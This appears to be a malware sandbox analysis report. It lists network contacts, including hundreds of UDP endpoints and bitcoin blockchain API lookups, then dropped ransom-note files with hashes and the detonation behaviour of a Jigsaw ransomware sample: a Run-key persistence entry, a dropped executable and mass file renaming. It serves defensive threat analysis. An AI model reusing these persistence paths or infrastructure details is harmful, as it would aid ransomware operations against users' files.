FR 178.33.161.222:6893 udp
FR 178.33.161.223:6893 udp
FR 178.33.161.224:6893 udp
FR 178.33.161.225:6893 udp
FR 178.33.161.226:6893 udp
FR 178.33.161.227:6893 udp
FR 178.33.161.228:6893 udp
FR 178.33.161.229:6893 udp
FR 178.33.161.230:6893 udp
FR 178.33.161.231:6893 udp
FR 178.33.161.232:6893 udp
FR 178.33.161.233:6893 udp
FR 178.33.161.234:6893 udp
FR 178.33.161.235:6893 udp
FR 178.33.161.236:6893 udp
FR 178.33.161.237:6893 udp
FR 178.33.161.238:6893 udp
FR 178.33.161.239:6893 udp
FR 178.33.161.240:6893 udp
FR 178.33.161.241:6893 udp
FR 178.33.161.242:6893 udp
FR 178.33.161.243:6893 udp
FR 178.33.161.244:6893 udp
FR 178.33.161.245:6893 udp
FR 178.33.161.246:6893 udp
FR 178.33.161.247:6893 udp
FR 178.33.161.248:6893 udp
FR 178.33.161.249:6893 udp
FR 178.33.161.250:6893 udp
FR 178.33.161.251:6893 udp
FR 178.33.161.252:6893 udp
FR 178.33.161.253:6893 udp
FR 178.33.161.254:6893 udp
FR 178.33.161.255:6893 udp
FR 178.33.162.0:6893 udp
FR 178.33.162.1:6893 udp
FR 178.33.162.2:6893 udp
FR 178.33.162.3:6893 udp
FR 178.33.162.4:6893 udp
FR 178.33.162.5:6893 udp
FR 178.33.162.6:6893 udp
FR 178.33.162.7:6893 udp
FR 178.33.162.8:6893 udp
FR 178.33.162.9:6893 udp
FR 178.33.162.10:6893 udp
FR 178.33.162.11:6893 udp
FR 178.33.162.12:6893 udp
FR 178.33.162.13:6893 udp
FR 178.33.162.14:6893 udp
FR 178.33.162.15:6893 udp
FR 178.33.162.16:6893 udp
FR 178.33.162.17:6893 udp
FR 178.33.162.18:6893 udp
FR 178.33.162.19:6893 udp
FR 178.33.162.20:6893 udp
FR 178.33.162.21:6893 udp
FR 178.33.162.22:6893 udp
FR 178.33.162.23:6893 udp
FR 178.33.162.24:6893 udp
FR 178.33.162.25:6893 udp
FR 178.33.162.26:6893 udp
FR 178.33.162.27:6893 udp
FR 178.33.162.28:6893 udp
FR 178.33.162.29:6893 udp
FR 178.33.162.30:6893 udp
FR 178.33.162.31:6893 udp
FR 178.33.162.32:6893 udp
FR 178.33.162.33:6893 udp
FR 178.33.162.34:6893 udp
FR 178.33.162.35:6893 udp
FR 178.33.162.36:6893 udp
FR 178.33.162.37:6893 udp
FR 178.33.162.38:6893 udp
FR 178.33.162.39:6893 udp
FR 178.33.162.40:6893 udp
FR 178.33.162.41:6893 udp
FR 178.33.162.42:6893 udp
FR 178.33.162.43:6893 udp
FR 178.33.162.44:6893 udp
FR 178.33.162.45:6893 udp
FR 178.33.162.46:6893 udp
FR 178.33.162.47:6893 udp
FR 178.33.162.48:6893 udp
FR 178.33.162.49:6893 udp
FR 178.33.162.50:6893 udp
FR 178.33.162.51:6893 udp
FR 178.33.162.52:6893 udp
FR 178.33.162.53:6893 udp
FR 178.33.162.54:6893 udp
FR 178.33.162.55:6893 udp
FR 178.33.162.56:6893 udp
FR 178.33.162.57:6893 udp
FR 178.33.162.58:6893 udp
FR 178.33.162.59:6893 udp
FR 178.33.162.60:6893 udp
FR 178.33.162.61:6893 udp
FR 178.33.162.62:6893 udp
FR 178.33.162.63:6893 udp
FR 178.33.162.64:6893 udp
FR 178.33.162.65:6893 udp
FR 178.33.162.66:6893 udp
FR 178.33.162.67:6893 udp
FR 178.33.162.68:6893 udp
FR 178.33.162.69:6893 udp
FR 178.33.162.70:6893 udp
FR 178.33.162.71:6893 udp
FR 178.33.162.72:6893 udp
FR 178.33.162.73:6893 udp
FR 178.33.162.74:6893 udp
FR 178.33.162.75:6893 udp
FR 178.33.162.76:6893 udp
FR 178.33.162.77:6893 udp
FR 178.33.162.78:6893 udp
FR 178.33.162.79:6893 udp
FR 178.33.162.80:6893 udp
FR 178.33.162.81:6893 udp
FR 178.33.162.82:6893 udp
FR 178.33.162.83:6893 udp
FR 178.33.162.84:6893 udp
FR 178.33.162.85:6893 udp
FR 178.33.162.86:6893 udp
FR 178.33.162.87:6893 udp
FR 178.33.162.88:6893 udp
FR 178.33.162.89:6893 udp
FR 178.33.162.90:6893 udp
FR 178.33.162.91:6893 udp
FR 178.33.162.92:6893 udp
FR 178.33.162.93:6893 udp
FR 178.33.162.94:6893 udp
FR 178.33.162.95:6893 udp
FR 178.33.162.96:6893 udp
FR 178.33.162.97:6893 udp
FR 178.33.162.98:6893 udp
FR 178.33.162.99:6893 udp
FR 178.33.162.100:6893 udp
FR 178.33.162.101:6893 udp
FR 178.33.162.102:6893 udp
FR 178.33.162.103:6893 udp
FR 178.33.162.104:6893 udp
FR 178.33.162.105:6893 udp
FR 178.33.162.106:6893 udp
FR 178.33.162.107:6893 udp
FR 178.33.162.108:6893 udp
FR 178.33.162.109:6893 udp
FR 178.33.162.110:6893 udp
FR 178.33.162.111:6893 udp
FR 178.33.162.112:6893 udp
FR 178.33.162.113:6893 udp
FR 178.33.162.114:6893 udp
FR 178.33.162.115:6893 udp
FR 178.33.162.116:6893 udp
FR 178.33.162.117:6893 udp
FR 178.33.162.118:6893 udp
FR 178.33.162.119:6893 udp
FR 178.33.162.120:6893 udp
FR 178.33.162.121:6893 udp
FR 178.33.162.122:6893 udp
FR 178.33.162.123:6893 udp
FR 178.33.162.124:6893 udp
FR 178.33.162.125:6893 udp
FR 178.33.162.126:6893 udp
FR 178.33.162.127:6893 udp
FR 178.33.162.128:6893 udp
FR 178.33.162.129:6893 udp
FR 178.33.162.130:6893 udp
FR 178.33.162.131:6893 udp
FR 178.33.162.132:6893 udp
FR 178.33.162.133:6893 udp
FR 178.33.162.134:6893 udp
FR 178.33.162.135:6893 udp
FR 178.33.162.136:6893 udp
FR 178.33.162.137:6893 udp
FR 178.33.162.138:6893 udp
FR 178.33.162.139:6893 udp
FR 178.33.162.140:6893 udp
FR 178.33.162.141:6893 udp
FR 178.33.162.142:6893 udp
FR 178.33.162.143:6893 udp
FR 178.33.162.144:6893 udp
FR 178.33.162.145:6893 udp
FR 178.33.162.146:6893 udp
FR 178.33.162.147:6893 udp
FR 178.33.162.148:6893 udp
FR 178.33.162.149:6893 udp
FR 178.33.162.150:6893 udp
FR 178.33.162.151:6893 udp
FR 178.33.162.152:6893 udp
FR 178.33.162.153:6893 udp
FR 178.33.162.154:6893 udp
FR 178.33.162.155:6893 udp
FR 178.33.162.156:6893 udp
FR 178.33.162.157:6893 udp
FR 178.33.162.158:6893 udp
FR 178.33.162.159:6893 udp
FR 178.33.162.160:6893 udp
FR 178.33.162.161:6893 udp
FR 178.33.162.162:6893 udp
FR 178.33.162.163:6893 udp
FR 178.33.162.164:6893 udp
FR 178.33.162.165:6893 udp
FR 178.33.162.166:6893 udp
FR 178.33.162.167:6893 udp
FR 178.33.162.168:6893 udp
FR 178.33.162.169:6893 udp
FR 178.33.162.170:6893 udp
FR 178.33.162.171:6893 udp
FR 178.33.162.172:6893 udp
FR 178.33.162.173:6893 udp
FR 178.33.162.174:6893 udp
FR 178.33.162.175:6893 udp
FR 178.33.162.176:6893 udp
FR 178.33.162.177:6893 udp
FR 178.33.162.178:6893 udp
FR 178.33.162.179:6893 udp
FR 178.33.162.180:6893 udp
FR 178.33.162.181:6893 udp
FR 178.33.162.182:6893 udp
FR 178.33.162.183:6893 udp
FR 178.33.162.184:6893 udp
FR 178.33.162.185:6893 udp
FR 178.33.162.186:6893 udp
FR 178.33.162.187:6893 udp
FR 178.33.162.188:6893 udp
FR 178.33.162.189:6893 udp
FR 178.33.162.190:6893 udp
FR 178.33.162.191:6893 udp
FR 178.33.162.192:6893 udp
FR 178.33.162.193:6893 udp
FR 178.33.162.194:6893 udp
FR 178.33.162.195:6893 udp
FR 178.33.162.196:6893 udp
FR 178.33.162.197:6893 udp
FR 178.33.162.198:6893 udp
FR 178.33.162.199:6893 udp
FR 178.33.162.200:6893 udp
FR 178.33.162.201:6893 udp
FR 178.33.162.202:6893 udp
FR 178.33.162.203:6893 udp
FR 178.33.162.204:6893 udp
FR 178.33.162.205:6893 udp
FR 178.33.162.206:6893 udp
FR 178.33.162.207:6893 udp
FR 178.33.162.208:6893 udp
FR 178.33.162.209:6893 udp
FR 178.33.162.210:6893 udp
FR 178.33.162.211:6893 udp
FR 178.33.162.212:6893 udp
FR 178.33.162.213:6893 udp
FR 178.33.162.214:6893 udp
FR 178.33.162.215:6893 udp
FR 178.33.162.216:6893 udp
FR 178.33.162.217:6893 udp
FR 178.33.162.218:6893 udp
FR 178.33.162.219:6893 udp
FR 178.33.162.220:6893 udp
FR 178.33.162.221:6893 udp
FR 178.33.162.222:6893 udp
FR 178.33.162.223:6893 udp
FR 178.33.162.224:6893 udp
FR 178.33.162.225:6893 udp
FR 178.33.162.226:6893 udp
FR 178.33.162.227:6893 udp
FR 178.33.162.228:6893 udp
FR 178.33.162.229:6893 udp
FR 178.33.162.230:6893 udp
FR 178.33.162.231:6893 udp
FR 178.33.162.232:6893 udp
FR 178.33.162.233:6893 udp
FR 178.33.162.234:6893 udp
FR 178.33.162.235:6893 udp
FR 178.33.162.236:6893 udp
FR 178.33.162.237:6893 udp
FR 178.33.162.238:6893 udp
FR 178.33.162.239:6893 udp
FR 178.33.162.240:6893 udp
FR 178.33.162.241:6893 udp
FR 178.33.162.242:6893 udp
FR 178.33.162.243:6893 udp
FR 178.33.162.244:6893 udp
FR 178.33.162.245:6893 udp
FR 178.33.162.246:6893 udp
FR 178.33.162.247:6893 udp
FR 178.33.162.248:6893 udp
FR 178.33.162.249:6893 udp
FR 178.33.162.250:6893 udp
FR 178.33.162.251:6893 udp
FR 178.33.162.252:6893 udp
FR 178.33.162.253:6893 udp
FR 178.33.162.254:6893 udp
FR 178.33.162.255:6893 udp
FR 178.33.163.0:6893 udp
FR 178.33.163.1:6893 udp
FR 178.33.163.2:6893 udp
FR 178.33.163.3:6893 udp
FR 178.33.163.4:6893 udp
FR 178.33.163.5:6893 udp
FR 178.33.163.6:6893 udp
FR 178.33.163.7:6893 udp
FR 178.33.163.8:6893 udp
FR 178.33.163.9:6893 udp
FR 178.33.163.10:6893 udp
FR 178.33.163.11:6893 udp
FR 178.33.163.12:6893 udp
FR 178.33.163.13:6893 udp
FR 178.33.163.14:6893 udp
FR 178.33.163.15:6893 udp
FR 178.33.163.16:6893 udp
FR 178.33.163.17:6893 udp
FR 178.33.163.18:6893 udp
FR 178.33.163.19:6893 udp
FR 178.33.163.20:6893 udp
FR 178.33.163.21:6893 udp
FR 178.33.163.22:6893 udp
FR 178.33.163.23:6893 udp
FR 178.33.163.24:6893 udp
FR 178.33.163.25:6893 udp
FR 178.33.163.26:6893 udp
FR 178.33.163.27:6893 udp
FR 178.33.163.28:6893 udp
FR 178.33.163.29:6893 udp
FR 178.33.163.30:6893 udp
FR 178.33.163.31:6893 udp
FR 178.33.163.32:6893 udp
FR 178.33.163.33:6893 udp
FR 178.33.163.34:6893 udp
FR 178.33.163.35:6893 udp
FR 178.33.163.36:6893 udp
FR 178.33.163.37:6893 udp
FR 178.33.163.38:6893 udp
FR 178.33.163.39:6893 udp
FR 178.33.163.40:6893 udp
FR 178.33.163.41:6893 udp
FR 178.33.163.42:6893 udp
FR 178.33.163.43:6893 udp
FR 178.33.163.44:6893 udp
FR 178.33.163.45:6893 udp
FR 178.33.163.46:6893 udp
FR 178.33.163.47:6893 udp
FR 178.33.163.48:6893 udp
FR 178.33.163.49:6893 udp
FR 178.33.163.50:6893 udp
FR 178.33.163.51:6893 udp
FR 178.33.163.52:6893 udp
FR 178.33.163.53:6893 udp
FR 178.33.163.54:6893 udp
FR 178.33.163.55:6893 udp
FR 178.33.163.56:6893 udp
FR 178.33.163.57:6893 udp
FR 178.33.163.58:6893 udp
FR 178.33.163.59:6893 udp
FR 178.33.163.60:6893 udp
FR 178.33.163.61:6893 udp
FR 178.33.163.62:6893 udp
FR 178.33.163.63:6893 udp
FR 178.33.163.64:6893 udp
FR 178.33.163.65:6893 udp
FR 178.33.163.66:6893 udp
FR 178.33.163.67:6893 udp
FR 178.33.163.68:6893 udp
FR 178.33.163.69:6893 udp
FR 178.33.163.70:6893 udp
FR 178.33.163.71:6893 udp
FR 178.33.163.72:6893 udp
FR 178.33.163.73:6893 udp
FR 178.33.163.74:6893 udp
FR 178.33.163.75:6893 udp
FR 178.33.163.76:6893 udp
FR 178.33.163.77:6893 udp
FR 178.33.163.78:6893 udp
FR 178.33.163.79:6893 udp
FR 178.33.163.80:6893 udp
FR 178.33.163.81:6893 udp
FR 178.33.163.82:6893 udp
FR 178.33.163.83:6893 udp
FR 178.33.163.84:6893 udp
FR 178.33.163.85:6893 udp
FR 178.33.163.86:6893 udp
FR 178.33.163.87:6893 udp
FR 178.33.163.88:6893 udp
FR 178.33.163.89:6893 udp
FR 178.33.163.90:6893 udp
FR 178.33.163.91:6893 udp
FR 178.33.163.92:6893 udp
FR 178.33.163.93:6893 udp
FR 178.33.163.94:6893 udp
FR 178.33.163.95:6893 udp
FR 178.33.163.96:6893 udp
FR 178.33.163.97:6893 udp
FR 178.33.163.98:6893 udp
FR 178.33.163.99:6893 udp
FR 178.33.163.100:6893 udp
FR 178.33.163.101:6893 udp
FR 178.33.163.102:6893 udp
FR 178.33.163.103:6893 udp
FR 178.33.163.104:6893 udp
FR 178.33.163.105:6893 udp
FR 178.33.163.106:6893 udp
FR 178.33.163.107:6893 udp
FR 178.33.163.108:6893 udp
FR 178.33.163.109:6893 udp
FR 178.33.163.110:6893 udp
FR 178.33.163.111:6893 udp
FR 178.33.163.112:6893 udp
FR 178.33.163.113:6893 udp
FR 178.33.163.114:6893 udp
FR 178.33.163.115:6893 udp
FR 178.33.163.116:6893 udp
FR 178.33.163.117:6893 udp
FR 178.33.163.118:6893 udp
FR 178.33.163.119:6893 udp
FR 178.33.163.120:6893 udp
FR 178.33.163.121:6893 udp
FR 178.33.163.122:6893 udp
FR 178.33.163.123:6893 udp
FR 178.33.163.124:6893 udp
FR 178.33.163.125:6893 udp
FR 178.33.163.126:6893 udp
FR 178.33.163.127:6893 udp
FR 178.33.163.128:6893 udp
FR 178.33.163.129:6893 udp
FR 178.33.163.130:6893 udp
FR 178.33.163.131:6893 udp
FR 178.33.163.132:6893 udp
FR 178.33.163.133:6893 udp
FR 178.33.163.134:6893 udp
FR 178.33.163.135:6893 udp
FR 178.33.163.136:6893 udp
FR 178.33.163.137:6893 udp
FR 178.33.163.138:6893 udp
FR 178.33.163.139:6893 udp
FR 178.33.163.140:6893 udp
FR 178.33.163.141:6893 udp
FR 178.33.163.142:6893 udp
FR 178.33.163.143:6893 udp
FR 178.33.163.144:6893 udp
FR 178.33.163.145:6893 udp
FR 178.33.163.146:6893 udp
FR 178.33.163.147:6893 udp
FR 178.33.163.148:6893 udp
FR 178.33.163.149:6893 udp
FR 178.33.163.150:6893 udp
FR 178.33.163.151:6893 udp
FR 178.33.163.152:6893 udp
FR 178.33.163.153:6893 udp
FR 178.33.163.154:6893 udp
FR 178.33.163.155:6893 udp
FR 178.33.163.156:6893 udp
FR 178.33.163.157:6893 udp
FR 178.33.163.158:6893 udp
FR 178.33.163.159:6893 udp
FR 178.33.163.160:6893 udp
FR 178.33.163.161:6893 udp
FR 178.33.163.162:6893 udp
FR 178.33.163.163:6893 udp
FR 178.33.163.164:6893 udp
FR 178.33.163.165:6893 udp
FR 178.33.163.166:6893 udp
FR 178.33.163.167:6893 udp
FR 178.33.163.168:6893 udp
FR 178.33.163.169:6893 udp
FR 178.33.163.170:6893 udp
FR 178.33.163.171:6893 udp
FR 178.33.163.172:6893 udp
FR 178.33.163.173:6893 udp
FR 178.33.163.174:6893 udp
FR 178.33.163.175:6893 udp
FR 178.33.163.176:6893 udp
FR 178.33.163.177:6893 udp
FR 178.33.163.178:6893 udp
FR 178.33.163.179:6893 udp
FR 178.33.163.180:6893 udp
FR 178.33.163.181:6893 udp
FR 178.33.163.182:6893 udp
FR 178.33.163.183:6893 udp
FR 178.33.163.184:6893 udp
FR 178.33.163.185:6893 udp
FR 178.33.163.186:6893 udp
FR 178.33.163.187:6893 udp
FR 178.33.163.188:6893 udp
FR 178.33.163.189:6893 udp
FR 178.33.163.190:6893 udp
FR 178.33.163.191:6893 udp
FR 178.33.163.192:6893 udp
FR 178.33.163.193:6893 udp
FR 178.33.163.194:6893 udp
FR 178.33.163.195:6893 udp
FR 178.33.163.196:6893 udp
FR 178.33.163.197:6893 udp
FR 178.33.163.198:6893 udp
FR 178.33.163.199:6893 udp
FR 178.33.163.200:6893 udp
FR 178.33.163.201:6893 udp
FR 178.33.163.202:6893 udp
FR 178.33.163.203:6893 udp
FR 178.33.163.204:6893 udp
FR 178.33.163.205:6893 udp
FR 178.33.163.206:6893 udp
FR 178.33.163.207:6893 udp
FR 178.33.163.208:6893 udp
FR 178.33.163.209:6893 udp
FR 178.33.163.210:6893 udp
FR 178.33.163.211:6893 udp
FR 178.33.163.212:6893 udp
FR 178.33.163.213:6893 udp
FR 178.33.163.214:6893 udp
FR 178.33.163.215:6893 udp
FR 178.33.163.216:6893 udp
FR 178.33.163.217:6893 udp
FR 178.33.163.218:6893 udp
FR 178.33.163.219:6893 udp
FR 178.33.163.220:6893 udp
FR 178.33.163.221:6893 udp
FR 178.33.163.222:6893 udp
FR 178.33.163.223:6893 udp
FR 178.33.163.224:6893 udp
FR 178.33.163.225:6893 udp
FR 178.33.163.226:6893 udp
FR 178.33.163.227:6893 udp
FR 178.33.163.228:6893 udp
FR 178.33.163.229:6893 udp
FR 178.33.163.230:6893 udp
FR 178.33.163.231:6893 udp
FR 178.33.163.232:6893 udp
FR 178.33.163.233:6893 udp
FR 178.33.163.234:6893 udp
FR 178.33.163.235:6893 udp
FR 178.33.163.236:6893 udp
FR 178.33.163.237:6893 udp
FR 178.33.163.238:6893 udp
FR 178.33.163.239:6893 udp
FR 178.33.163.240:6893 udp
FR 178.33.163.241:6893 udp
FR 178.33.163.242:6893 udp
FR 178.33.163.243:6893 udp
FR 178.33.163.244:6893 udp
FR 178.33.163.245:6893 udp
FR 178.33.163.246:6893 udp
FR 178.33.163.247:6893 udp
FR 178.33.163.248:6893 udp
FR 178.33.163.249:6893 udp
FR 178.33.163.250:6893 udp
FR 178.33.163.251:6893 udp
FR 178.33.163.252:6893 udp
FR 178.33.163.253:6893 udp
FR 178.33.163.254:6893 udp
FR 178.33.163.255:6893 udp
US 8.8.8.8:53 api.blockcypher.com udp
US 104.20.99.10:80 api.blockcypher.com tcp
US 8.8.8.8:53 btc.blockr.io udp
US 8.8.8.8:53 bitaps.com udp
NL 178.128.255.179:443 bitaps.com tcp
US 8.8.8.8:53 chain.so udp
US 172.67.40.90:443 chain.so tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 88.221.134.146:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 95.100.245.144:80 www.microsoft.com tcp

Files

memory/2148-0-0x0000000001BC0000-0x0000000001BF1000-memory.dmp

memory/2148-1-0x0000000000400000-0x0000000000435000-memory.dmp

memory/2148-2-0x0000000000400000-0x0000000000435000-memory.dmp

memory/2148-5-0x0000000000400000-0x0000000000435000-memory.dmp

memory/2148-108-0x0000000000400000-0x0000000000435000-memory.dmp

memory/2148-116-0x0000000000400000-0x0000000000435000-memory.dmp

memory/2148-131-0x0000000000400000-0x0000000000435000-memory.dmp

C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___PXAGF_.hta

MD5 3face2e9a0a3e60fdc9930a84c771f88
SHA1 932f2a9836a7413fc1a37a27c9f7c2a8ce4a9488
SHA256 de0766fb328358d862ac96ab7eabd1c039f287357d0a5635afaf1efb2263a51e
SHA512 b30a66715d06170994502b8f49d1d73b6e178a17671a64a966d7e50cc992691e6c64a091cbf726841ee5190e770e9e32c78c727a6a1c564ce1d5365926163381

C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___MMBXD_.txt

MD5 ce6750350f546e259e494549bfd53282
SHA1 5b2ae19bdfd94cfec9b4919e3a340d02cc40177b
SHA256 5716236fc215ed32b2bb079d848911d5a02e42eeef64205bf4b4ae432f69ef6c
SHA512 b7fbaae8aa4d2155a367aea27e23506e9e6053bf6ea6637265d9418a0c4a7f06b161f626951c0092b4c2939f1a9e245e22a4d69fbc6bc525b52368fd8928fb6e

memory/2148-152-0x0000000000440000-0x0000000000451000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab85C.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar87E.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-28 22:32

Reported

2024-11-28 22:35

Platform

win10v2004-20241007-en

Max time kernel

121s

Max time network

137s

Command Line

"C:\Users\Admin\AppData\Local\Temp\jigsaw.exe"

Signatures

Jigsaw Ransomware

ransomware jigsaw

Jigsaw family

jigsaw

Renames multiple (3738) files with added filename extension

ransomware

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\jigsaw.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Local\Temp\jigsaw.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\PhotosAppList.scale-100.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarSmallTile.scale-200.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_PigEar.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\adobe_spinner.gif.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\Date.targetsize-16_contrast-white.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubWideTile.scale-200_contrast-white.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.scale-180.png.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\download.svg.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sl-si\ui-strings.js C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GetStartedMedTile.scale-200_contrast-black.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-48_altform-unplated.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Microsoft Office\root\vreg\excel.x-none.msi.16.x-none.vreg.dat.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_2.34.28001.0_x64__8wekyb3d8bbwe\Assets\GameBar_MedTile.scale-200.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\OrientationControlMiddleCircle.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\StoreAppList.scale-100.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\WideTile.scale-200.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarSplashLogo.scale-100.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons_retina_thumb.png.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\share_icons.png.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SplashWideTile.scale-125_contrast-black.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleAppList.targetsize-64.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_hover_2x.png.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-24.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.contrast-black_scale-180.png.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\EssentialReport.dotx C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\PhotosMedTile.scale-125.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteSmallTile.scale-150.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\javaws.jar C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-white_targetsize-16.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageStoreLogo.scale-125_contrast-white.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Images\SkypeTile.scale-200_contrast-white.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailBadge.scale-400.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
